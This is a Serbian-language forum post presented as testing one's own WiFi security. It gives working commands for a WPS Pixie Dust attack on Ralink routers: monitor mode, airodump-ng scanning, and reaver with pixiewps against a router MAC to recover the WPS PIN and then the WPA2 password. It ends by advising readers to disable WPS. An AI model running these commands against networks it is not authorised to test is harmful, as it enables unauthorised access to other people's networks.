Testiranje sigurnosti sopstvene WiFi mreže

Pravila foruma
Praktikujemo da na kraju opišemo kako smo rešili problem. Zatim zatvorimo temu >UPUTSTVO<
Vido
_
_
Postovi: 2
Pridružen: 07 Jan 2018, 22:18
Location: 127.0.0.1
Specialty: computers

Testiranje sigurnosti sopstvene WiFi mreže

Post napisao Vido » 07 Jan 2018, 23:58

Napomena:Provaljivanje šifri mreža koje nisu u sopstvenom vlasništvu je kažnjivo zakonom, s toga prije nego što testirate nečiju WiFi mreže tražite odobrenje, za nastalu štetu korišćenjem ovog teksta nisam odgovoran, vozite sigurno

Prije određenog vremena na netu sam naišao na veliki sigurnosni koji se tiče WiFi mreža koje koriste WPA2 sigurnosni protokol pa sam odličio sa vama da podijelim iskustva i kako da se zaštitite.
Radi se o tome da kod rutera koji koriste Ralinkov WiFi čipset moguće je utvrditi trenutni PIN šifre na osnovu nekoliko parametara SEED-a, N1, ES1 i ES2 koje emituje ruter u svakodnevnom radu.
Da bi uspješno testirali tu teoriju na računaru je potrebno da se vrti kernel 4.5+ da imamo instaliran aircrack-ng set alata, reaver 1.6.3 kao i pixiewps 1.4
Prvo je potreno da interfejs wifi kartice prebacimo iz mode-a Managed u mod Monitor

Kod: Označi sve

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig $interface up
Nakon skeniranja WiFi mreža pomoću airodump-ng wlan0 i utvrđivanja MAC adrese rutera kao i kanala na kom emituje signal potrebno je da pokrenemo

reave -i wlan0 -b E4:6F:13:67:B4:AE -c 1 -K 1 -N -v

slika

gdje je -i interfejs, odnosno wifi kartica, obično je to wlan0, pokrenite komandu iwconfig da utvrdite koji je vaš interfejs

Kod: Označi sve

$ iwconfig 
enp2s0    no wireless extensions.

lo        no wireless extensions.

vmnet1    no wireless extensions.

wlan0  IEEE 802.11bgn  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
vmnet8    no wireless extensions.
-b <mac adresa> VAŠEG rutera, -c 3 kanal na kom ruter trenutno emituje signal, sa -K 1 pokrećemo "napad" na pomenuti sigurnosni propust, -N znači ne šalji određene pakete i -v je prikazivanje trenutnog stanja

kada dobijemo pin pokrenemo

Kod: Označi sve

reaver -i wlan0 -b E4:6F:13:67:B4:AE -c 1 -p 9xxxxxx0 -N -v
slika

Šifra nam se nalazi pod PSK

Kako bi se zaštitili potreno je da na ruteru ugasimo WPS

slika

Odgovori

Natrag na “Linux - softverski problemi”